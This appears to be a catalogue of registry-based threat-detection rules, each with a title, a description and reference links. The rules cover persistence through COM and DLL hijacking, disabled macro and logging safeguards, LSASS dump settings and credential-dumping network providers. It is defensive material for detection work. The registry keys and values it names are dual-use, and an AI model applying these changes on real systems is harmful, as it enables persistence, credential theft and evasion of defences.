Displaying Hidden Files Feature Disabled |
Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files.
This technique is abused by several malware families to hide their files from normal users.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry |
Registry Hide Function from User |
Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla and Hermetic Wiper use this technique) |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md |
Hide Schedule Task Via Index Value Tamper |
Detects when the "index" value of a scheduled task is modified via the registry,
which effectively hides it from any tooling such as "schtasks /query" (read the referenced link for more information about the effects of this technique)
|
https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments |
Driver Added To Disallowed Images In HVCI - Registry |
Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.
|
https://github.com/yardenshafir/conference_talks/blob/3de1f5d7c02656c35117f067fbff0a219c304b09/OffensiveCon_2023_Your_Mitigations_are_My_Opportunities.pdf, https://x.com/yarden_shafir/status/1822667605175324787 |
IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols |
Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.
|
https://twitter.com/M_haggis/status/1699056847154725107, https://twitter.com/JAMESWT_MHT/status/1699042827261391247, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries, https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content |
Uncommon Extension In Keyboard Layout IME File Registry Value |
Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
|
https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/ |
Suspicious Path In Keyboard Layout IME File Registry Value |
Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.
Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path.
IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.
|
https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/ |
New Root or CA or AuthRoot Certificate to Store |
Detects the addition of new root, CA or AuthRoot certificates to the Windows registry |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store, https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec |
Internet Explorer DisableFirstRunCustomize Enabled |
Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows.
|
https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf, https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/, https://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise |
Potential Ransomware Activity Using LegalNotice Message |
Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages |
https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md |
Lolbas OneDriveStandaloneUpdater.exe Proxy Download |
Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any
anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
|
https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/ |
Lsass Full Dump Request Via DumpType Registry Settings |
Detects the setting of the "DumpType" registry value to "2", which stands for a "Full Dump". Techniques such as LSASS Shtinkering require this value to be "2" in order to dump LSASS. |
https://github.com/deepinstinct/Lsass-Shtinkering, https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf |
RestrictedAdminMode Registry Value Tampering |
Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.
|
https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md, https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx |
Blue Mockingbird - Registry |
Attempts to detect system changes made by Blue Mockingbird |
https://redcanary.com/blog/blue-mockingbird-cryptominer/ |
Potential Persistence Via Netsh Helper DLL - Registry |
Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
|
https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll, https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/ |
New Netsh Helper DLL Registered From A Suspicious Location |
Detects changes to the Netsh registry key to add a new DLL value that is located in a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
|
https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll, https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/ |
NET NGenAssemblyUsageLog Registry Key Tamper |
Detects changes to the NGenAssemblyUsageLog registry key.
.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).
By simply specifying an arbitrary value (e.g. a fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.
|
https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/ |
New Application in AppCompat |
A general detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint. |
https://github.com/OTRF/detection-hackathon-apt29/issues/1, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md |
Potential Credential Dumping Attempt Using New NetworkProvider - REG |
Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it |
https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade, https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy |
New ODBC Driver Registered |
Detects the registration of a new ODBC driver. |
https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ |
Potentially Suspicious ODBC Driver Registered |
Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location |
https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ |
Microsoft Office Protected View Disabled |
Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/, https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/, https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview |
Trust Access Disable For VBApplications |
Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. |
https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ |
Python Function Execution Security Warning Disabled In Excel - Registry |
Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
|
https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327 |
Enable Microsoft Dynamic Data Exchange |
Detects enabling of the Dynamic Data Exchange (DDE) protocol in all supported editions of Microsoft Word or Excel. |
https://msrc.microsoft.com/update-guide/vulnerability/ADV170021 |
Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting |
Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module |
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53, https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/ |
Outlook Macro Execution Without Warning Setting Enabled |
Detects the modification of Outlook security setting to allow unprompted execution of macros. |
https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53 |
Outlook EnableUnsafeClientMailRules Setting Enabled - Registry |
Detects an attacker trying to enable the Outlook security setting "EnableUnsafeClientMailRules", which allows Outlook to run applications or execute macros |
https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44 |
Outlook Security Settings Updated - Registry |
Detects changes to the registry values related to Outlook security settings |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md, https://learn.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings |
Uncommon Microsoft Office Trusted Location Added |
Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. |
Internal Research, https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01 |
Macro Enabled In A Potentially Suspicious Document |
Detects registry changes to Office trust records where the path is located in a potentially suspicious location |
https://twitter.com/inversecos/status/1494174785621819397, Internal Research |
Office Macros Warning Disabled |
Detects registry changes to Microsoft Office "VBAWarning" to a value of "1" which enables the execution of all macros, whether signed or unsigned. |
https://twitter.com/inversecos/status/1494174785621819397, https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/, https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ |
MaxMpxCt Registry Value Changed |
Detects changes to the "MaxMpxCt" registry value.
MaxMpxCt specifies the maximum number of outstanding network requests the server allows per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note that if the value is set beyond 125, older Windows 9x clients will fail to negotiate.
Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
|
https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps, https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware, https://www.intrinsec.com/alphv-ransomware-gang-analysis/?cn-reloaded=1, https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/ |
Potential Persistence Using DebugPath |
Detects potential persistence using Appx DebugPath |
https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/, https://github.com/rootm0s/WinPwnage |
Potential Persistence Via AppCompat RegisterAppRestart Layer |
Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
This can be potentially abused as a persistence mechanism.
|
https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md |
Potential Persistence Via App Paths Default Property |
Detects changes to the "Default" property for keys located under the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry key, which might be used as a method of persistence.
The entries found under App Paths are used primarily for the following purposes:
First, to map an application's executable file name to that file's fully qualified path.
Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
|
https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/, https://learn.microsoft.com/en-us/windows/win32/shell/app-registration |
Potential Persistence Via AutodialDLL |
Detects changes to the "AutodialDLL" key, which could be used as a persistence method to load a custom DLL via the "ws2_32" library. |
https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/, https://persistence-info.github.io/Data/autodialdll.html |
Potential Persistence Via CHM Helper DLL |
Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence. |
https://persistence-info.github.io/Data/htmlhelpauthor.html, https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/ |
Potential PSFactoryBuffer COM Hijacking |
Detects changes to the PSFactory COM InProcServer32 registry key. This technique was used by RomCom to create persistence by storing a malicious DLL. |
https://blogs.blackberry.com/en/2023/06/romcom-resurfaces-targeting-ukraine, https://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html, https://www.virustotal.com/gui/file/6d3ab9e729bb03ae8ae3fcd824474c5052a165de6cb4c27334969a542c7b261d/detection, https://www.trendmicro.com/en_us/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html |
COM Object Hijacking Via Modification Of Default System CLSID Default Value |
Detects potential COM object hijacking via modification of default system CLSID. |
https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea), https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/, https://blog.talosintelligence.com/uat-5647-romcom/, https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques, https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea |
Potential Persistence Via Custom Protocol Handler |
Detects potential persistence activity via the registration of a new custom protocol handler. While legitimate applications often register protocol handlers during installation, an attacker can abuse this by setting a custom handler to be used as a persistence mechanism. |
https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/ |
Potential Persistence Via Event Viewer Events.asp |
Detects potential registry persistence technique using the Event Viewer "Events.asp" technique |
https://twitter.com/nas_bench/status/1626648985824788480, https://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks, https://www.hexacorn.com/blog/2019/02/15/beyond-good-ol-run-key-part-103/, https://github.com/redcanaryco/atomic-red-team/blob/f296668303c29d3f4c07e42bdd2b28d8dd6625f9/atomics/T1112/T1112.md |
Potential Persistence Via GlobalFlags |
Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys |
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/, https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ |
Modification of IE Registry Settings |
Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the Trusted Sites zone or insert JavaScript for persistence. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry |
Register New IFilter For Persistence |
Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.
You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.
|
https://persistence-info.github.io/Data/ifilters.html, https://twitter.com/0gtweet/status/1468548924600459267, https://github.com/gtworek/PSBits/tree/master/IFilter, https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308 |
Potential Persistence Via LSA Extensions |
Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
|
https://persistence-info.github.io/Data/lsaaextension.html, https://twitter.com/0gtweet/status/1476286368385019906 |
Potential Persistence Via Mpnotify |
Detects when an attacker registers a new SIP provider for persistence and defense evasion. |
https://persistence-info.github.io/Data/mpnotify.html, https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek |
Potential Persistence Via Excel Add-in - Registry |
Detects potential persistence via the creation of an Excel add-in (XLL) file to make it run automatically when Excel is started. |
https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md, https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence |
Potential Persistence Via MyComputer Registry Keys |
Detects modification of the "Default" value of the "MyComputer" key and its subkeys to point to a custom binary that will be launched whenever the associated action is executed (see the reference section for an example). |
https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/ |
Potential Persistence Via TypedPaths |
Detects modification of or addition to the 'TypedPaths' key in the user or admin registry hive from a non-standard application, which might indicate a persistence attempt. |
https://twitter.com/dez_/status/1560101453150257154, https://forensafe.com/blogs/typedpaths.html |
Potential Persistence Via Outlook Today Page |
Detects potential persistence activity via the Outlook Today page.
An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl".
|
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74, https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change |
Potential Persistence Via Scrobj.dll COM Hijacking |
Detects use of scrobj.dll, as this DLL looks for the ScriptletURL key to get the location of the script to execute. |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md |
Potential WerFault ReflectDebugger Registry Value Abuse |
Detects potential WerFault "ReflectDebugger" registry value abuse for persistence. |
https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html, https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/ |
Potential Persistence Via Visual Studio Tools for Office |
Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications. |
https://twitter.com/_vivami/status/1347925307643355138, https://vanmieghem.io/stealth-outlook-persistence/ |
Suspicious Shim Database Patching Activity |
Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. |
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/, https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html |
PowerShell Script Execution Policy Enabled |
Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed. |
https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts |
Potential Attachment Manager Settings Associations Tamper |
Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) |
https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738, https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 |
Potential Persistence Via Outlook Home Page |
Detects potential persistence activity via the Outlook home page.
An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.
|
https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70, https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us, https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change |
Potential Persistence Via DLLPathOverride |
Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence; the referenced DLL will be loaded by the "SearchIndexer.exe" process. |
https://persistence-info.github.io/Data/naturallanguage6.html, https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/ |
Potential Persistence Via Shim Database In Uncommon Location |
Detects the installation of a new shim database where the file is located in a non-default location. |
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/, https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf |
Potential Attachment Manager Settings Attachments Tamper |
Detects tampering with the attachment manager settings policy attachments (see reference for more information). |
https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738, https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465 |
PowerShell as a Service in Registry |
Detects PowerShell code written to the registry as a service. |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Potential Persistence Via Shim Database Modification |
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb, https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/ |
Potential PowerShell Execution Policy Tampering |
Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution |
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3 |
Suspicious Powershell In Registry Run Keys |
Detects potential PowerShell commands or code within registry run keys |
https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry, https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html |
PowerShell Logging Disabled Via Registry Key Tampering |
Detects changes to the registry for the currently logged-in user in order to disable PowerShell module logging, script block logging, or transcription and script execution logging. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled |
Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG |
Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". |
https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/, https://twitter.com/0gtweet/status/1674399582162153472 |
Usage of Renamed Sysinternals Tools - RegistrySet |
Detects non-Sysinternals tools setting the "accepteula" key, which is normally set on Sysinternals tool execution. |
Internal Research |
ETW Logging Disabled For rpcrt4.dll |
Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll |
http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html |
Potentially Suspicious Command Executed Via Run Dialog Box - Registry |
Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
|
https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf, https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71, https://www.forensafe.com/blogs/runmrukey.html, https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/ |
ScreenSaver Registry Key Set |
Detects a registry key set after execution of a masqueraded .scr file using Rundll32 through desk.cpl. |
https://twitter.com/VakninHai/status/1517027824984547329, https://twitter.com/pabraeken/status/998627081360695297, https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files |
Potential SentinelOne Shell Context Menu Scan Command Tampering |
Detects potentially suspicious changes to the SentinelOne context menu scan command by a process other than SentinelOne. |
https://mrd0x.com/sentinelone-persistence-via-menu-context/ |
ETW Logging Disabled For SCM |
Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM) |
http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html |
ServiceDll Hijack |
Detects changes to the "ServiceDLL" value related to a service in the registry.
This is often used as a method of persistence.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time, https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/ |
Registry Explorer Policy Modification |
Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md |
Persistence Via New SIP Provider |
Detects when an attacker registers a new SIP provider for persistence and defense evasion. |
https://persistence-info.github.io/Data/codesigning.html, https://github.com/gtworek/PSBits/tree/master/SIP, https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf |
Tamper With Sophos AV Registry Keys |
Detects tampering attempts against Sophos AV functionality via registry key modification. |
https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ |
Hiding User Account Via SpecialAccounts Registry Key |
Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide a user account from being listed on the logon screen. |
https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/, https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md |
Activate Suppression of Windows Security Center Notifications |
Detects setting Notification_Suppress to 1 to disable Windows Security Center notifications. |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md |
Suspicious Environment Variable Has Been Registered |
Detects the creation of user-specific or system-wide environment variables via the registry that contain suspicious commands and strings. |
https://infosec.exchange/@sbousseaden/109542254124022664 |
Suspicious Keyboard Layout Load |
Detects the installation of a keyboard preload with a suspicious keyboard layout, e.g. a Chinese, Iranian or Vietnamese layout loaded in a user session on systems maintained by US staff only. |
https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index, https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files |
Potential PendingFileRenameOperations Tampering |
Detects changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious image locations to stage currently used files for rename or deletion after reboot.
|
https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6, https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN, https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html, https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html |
Suspicious Printer Driver Empty Manufacturer |
Detects a suspicious printer driver installation with an empty Manufacturer value. |
https://twitter.com/SBousseaden/status/1410545674773467140 |
Registry Persistence via Explorer Run Key |
Detects a possible persistence mechanism using the RUN key for Windows Explorer pointing to a suspicious folder. |
https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/ |
New RUN Key Pointing to Suspicious Folder |
Detects a suspicious new RUN key element pointing to an executable in a suspicious folder. |
https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html |
Suspicious Service Installed |
Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.
Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
|
https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ |
Modify User Shell Folders Startup Value |
Detects modification of the startup key to a path where a payload could be stored to be launched during startup. |
https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1547.001/T1547.001.md |
Enable LM Hash Storage |
Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
|
